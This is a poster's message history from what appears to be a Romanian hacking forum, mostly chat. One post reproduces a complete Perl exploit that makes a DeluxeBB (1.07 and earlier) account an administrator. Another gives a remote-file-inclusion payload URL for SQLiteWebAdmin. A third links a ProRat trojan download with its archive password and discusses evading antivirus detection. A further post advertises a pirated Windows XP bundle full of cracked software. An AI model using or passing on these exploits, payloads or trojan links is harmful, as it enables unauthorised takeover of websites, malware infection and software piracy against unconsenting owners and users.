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Everything posted by darkking

  1. DVD Version Windows XP PeerWeb Turbo Edition 4.0 WPI - 32bit Core OS has been Changed to Make Windows Run Faster and Smarter... Note: You Can Only Do a Clean Install. This Version is UK/USA Only Version Updates, Tweaks, & Extras: integrated .Net Framework V2.0 integrated SP2 Post Hotfixs integrated Office Update Engine v1.2 integrated HighMAT Support integrated Driver Packs v6.03.4 Custom Windows Setup Logo Custom OEM Info/Logo Extra Wallpaper/Themes Integrated Themes: VistaXP OSminimal KDEL Plex Style Royale Windows.NET Luna Element 5 Integrated Driver Packs: Chipset V6.03.1 CPU V6.03 Graphics A V6.03 Graphics B V6.03 Graphics C V6.03 LAN V6.03.1 MassStorage V6.03 Sound A V6.03 Sound B V6.03 Sound C V6.03 Integrated Programs: Ad-aware SE v1.06r DivX Web Player v1.0 Crap Cleaner v1.27.260 IrfanView v3.98 MicroBurner v5.0 Microsoft ClearType v1.1 Microsoft VirtualCD v2.1 Firefox v1.5.1 DAMN NFO Viewer v2.10.0032 7-Zip v4.37 beta FastStone Image Viewer v2.3 MozBackup v1.4.3 uTorrent v1.5.437 Foxit Reader v1.3 Startup Control Panel v2.8 SafeXP v1.5.7.14 VideoLAN Player v0.8.4a Software Automatic Installed WPI: OPTIONAL Office 2003 Professional .NET Framework v2.0 O&O Defrag Pro v8.0 IntelliType Pro v5.0 XPize Shell Replacement Pack v4.3 AutoIt v3.1.0 PaintShop Pro v9.0 Total Commander v6.50 Winamp v5.2.1 Pro WinRAR v3.51 Azureus v2.4.0.2 GrabIt 1.6.0 Beta QuickPar v0.9.1.0 Sun JAVA SE v1.5.6 Outpost Firewall Pro v3.5 NOD32 v2.51.20 DVD Shrink v3.2.0.15 Filter and Codec Pack v3.1.2 Nero Burning Rom v7.0.8.2 lite AnyDVD v5.9.4.1 Limewire v4.9.41 Pro Shareaza v2.2.1.0 SureThing CD DVD Labeler v4.3 Look ‘n’ Stop v2.05p2 Daemon Tools v4.03 Media Player Classic v6.4.9.0 Windows Media Lite v2.2.0 Sneaky's DriverPacks v6.03.4 Changes from 3.0 to 4.0 Added VistaXP Theme Added OSminimal Theme Added Office Update Engine v1.2 Added HighMAT Support Added DivX Web Player v1.0 Added Crap Cleaner v1.27.260 Added MicroBurner v5.0 Added SafeXP v1.5.7.14 Added Microsoft ClearType v1.1 Added Microsoft VirtualCD v2.1 Added GrabIt 1.6.0 Beta Added QuickPar v0.9.1.0 Added Outpost Firewall Pro v3.5 Added DVD Shrink v3.2.0.15 Added Filter and Codec Pack v3.1.2 Added AnyDVD v5.9.4.1 Added SureThing CD DVD Labeler v4.3 Deluxe Added IntelliType Pro v5.0 Added XPize Shell Replacement Pack v4.3 Added AutoIt v3.1.0 Added PaintShop Pro v9.0 Added FastStone Image Viewer v2.3 Added MozBackup v1.4.3 Added uTorrent v1.5.437 Added Foxit Reader v2.0 Added Startup Control Panel v2.8 Added VideoLAN Player v0.8.4a Added 7-Zip v4.37 beta Added DAMN NFO Viewer v2.10.0032 Added Limewire v4.9.41 Pro Added Look ‘n’ Stop v2.05p2 Added Daemon Tools v4.03 Added Media Player Classic v6.4.9.0 Added Windows Media Lite v2.2.0 Added Sneaky's DriverPacks v6.03.4 Added More Reg Tweaks Setting Removed FairUse Removed Ares Removed FireTweaker Removed eXeem v0.20 Removed Recovery Console Removed K-Lite Mega Codec Pack Removed FairUse Wizard Removed NFO Viewer Updated Shareaza v2.1 to v2.2.1.0 Updated FireFox v1.0 to v1.5.1 Updated Nero v6.6.0.6 to v7.0.8.2 lite Updated Ad-Aware SE Pro v1.05 to v1.06r Updated NOD32 v2.12.1 to v2.51.20 Updated .net v1.1 to .net v2.0 Updated Winamp v5.04 to v5.2.1 Pro Updated Sun JAVA SE v1.5.1 to v1.5.6 Updated Azureus v2.2.0.2 to v2.4.0.2 Updated IrfanView v3.95 to v3.98 Updated WinRAR v3.4.2 to v3.51 Fixed Bugs Fixed Sata/RAID not working Fixed .Net Not Installing Bug Changed Comes in DVD and CD Versions Changed Programs Now Installed with WPI and not BAT files Changed Base on New Faster OS Core Changed Use 30% less ram and less disk space and cpu time Download Links http://www.mininova.org/tor/322555 http://www.sladinki007.net/index.php?showtopic=31344 http://www.demonoid.com/files/details/333628/ Screenshots: http://www.hidebehind.com/4473D23/i http://www.hidebehind.com/2F609B2C http://www.hidebehind.com/A4EA32FC
  2. <div class='quotetop'>QUOTE("YceFire")</div> bha, n'are cum , aia e iubita perfecta,adica , nu te inseala, este cu tine oriunde te'ai duce,nu pune mana pe p*** altuia :@ :@ :@ ,[/quote:2b045f19c4] deja daca merge cu tine oriunde te-ai duce nu mai e perfecta :D
  3. darkking


    bine ai venit si... have fun
  4. de vreo 2 sapt. sunt pe liber dar na voi posta una cu ex-one
  5. Detalii: vulnerabilitate intanlita la versiunile 1.07 sau mai vechi. Versiunea 1.08 a fost patch-uita #!/usr/bin/perl # DeluxeBB <= 1.07 Create Admin Exploit # ## [url]www.h4ckerz.com[/url] / [url]www.hackerz.ir[/url] / [url]www.aria-security.net[/url] # ./2006-6-25 ### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV[0]; $uname = $ARGV[1]; $passwd = $ARGV[2]; $url = "http://".$host; print q( ########################################################### # DeluxeBB <= 1.07 Create Admin Exploit # # [url]www.hackerz.ir[/url] - [url]www.h4ckerz.com[/url] # ################### Coded By Hessam-x ##################### ); if (@ARGV < 3) { print " # usage : hx.pl [host&path] [uname] [pass]n"; print " # E.g : hx.pl [url]www.milw0rm.com/deluxebb/[/url] str0ke 123456n"; exit(); } print " [~] User/Password : $uname/$passwd n"; print " [~] Host : $host n"; print " [~] Login ... "; # Login In DeluxeBB <= 1.07 Create Admin Exploit $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $xpl->cookie_jar( $cookie_jar ); $res = $xpl->post($url.'misc.php', Content => [ "sub" => "login", "name" => "$uname", "password" => "$passwd", "submit" => "Log-in", "redirect" => "", "expiry" => "990090909", ],); if($cookie_jar->as_string =~ /memberpw=(.*?);/) { print "successfully .n"; } else { print "UNsuccessfully !n"; print " [-] Can not Login In $host !n"; print $cookie_jar->as_string; exit(); } # Creat Admin $req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0'. '&xmsn=h4x0r',membercode='5&xicq=&xaim=&xyim=&xlocation=&' . 'xsite=&languagex=English&skinx=default&xthetimeoffset=0&xthedateformat=' . 'd.m.y&xthetimeformat=12&invisiblebrowse=0&markposts=15&submit=Update'); $tst = $xpl->get($url.'index.php'); if ($tst->as_string =~ /Admin Cp/) { print " [+] You Are Admin Now !!"; } else { print " [-] Exploit Failed !"; }
  6. <div class='quotetop'>QUOTE("Death")</div> ei na eu photoshoped
  7. MU says: "Unfortunately, the link you have clicked is not available."
  8. athlon 64 3400+ - screenshot cand ajung acasa si dual P4 - 1.5 Ghz - total 3.0 GHz - la work (here: http://img215.imageshack.us/img215/1161/cpuux5.jpg )
  9. lol ... super tare. chiar in perioada asta faceam un tur de forta prin tot star wars'ul...
  10. SQLiteWebAdmin http://sourceforge.net/projects/sqlitewebadmin SQLiteWebAdmin is a simple PHP program for administrating a SQL DataBase. It suffers of a Remote File Inclusion Vulnerability. The bug is in the "tpl.inc.php" program in the "lib" directory, and is exploited when passing the parameter "conf[classpath]". http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT] Succesfull explotation, needs register_globals=on Source from: addict3d.org
  11. <div class='quotetop'>QUOTE("Kw3[R)</div> problema nu e numai asta. de exemplu, as putea avea 0 posturi (nu ca am multe ) dar sa nu am ce posta. in plus, sa postezi doar mesaje de "merci" ... samd nu e chiar cum ai fi activ. in fine, parerea mea PS: nici sa iei de pe alte forumuri sa postezi aici nu e prea "corect" dar ar merge
  12. <div class='quotetop'>QUOTE("Sad_Dreamer")</div> really ? [url]http://prorat.net/news/news.php?detail=n1111711918.news[/url] sau prorat.net prima pagina, la news in turca si engleza. so stfu.
  13. well, editia speciala. dar tot e detectabil. poate cineva o sa poata face un tutorial despre cum faci un trojan nedetectabil. staim ceva de genul ca schimbi offset-ul, dar nu mai merge in ultimul timp, cel mai bine am putut sa modific astfel incat sa fie detectat doar de 2 antivirusi... Prorat special edition: download: [url]http://rapidshare.de/files/25620893/pat.rar[/url] archive pass: f100019507DK.at.RST user: mohdjase1 pass: 66618e869accfc4f96
  14. chiar nu poate sa-l puna nimeni pe rapidshare.de ? merci.
  15. darkking


    Buna, sunt Aurel din Roman.
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